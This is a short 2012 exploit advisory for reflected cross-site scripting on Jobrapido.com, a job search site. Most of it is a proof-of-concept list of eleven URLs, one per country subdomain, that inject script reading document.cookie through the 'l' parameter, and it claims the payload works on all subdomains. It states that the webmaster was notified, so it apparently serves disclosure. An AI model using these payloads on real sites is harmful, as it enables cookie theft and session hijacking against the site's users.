+--------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title : Jobrapido.com Multiple XSS
# Date : 07-03-2012
# Author : Ivano Binetti (http://www.ivanobinetti.com)
# Web site : http://www.jobrapido.com
# Web master notification : 07/11/2011
+--------------------------------------------------------------------------------------------------------------------------------+
PoC:
http://us.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://uk.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://it.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://ae.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://ao.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://ar.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://at.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://au.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://be.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://br.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://ca.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
This Poc works for all third-level domains.
+--------------------------------------------------------------------------------------------------------------------------------+
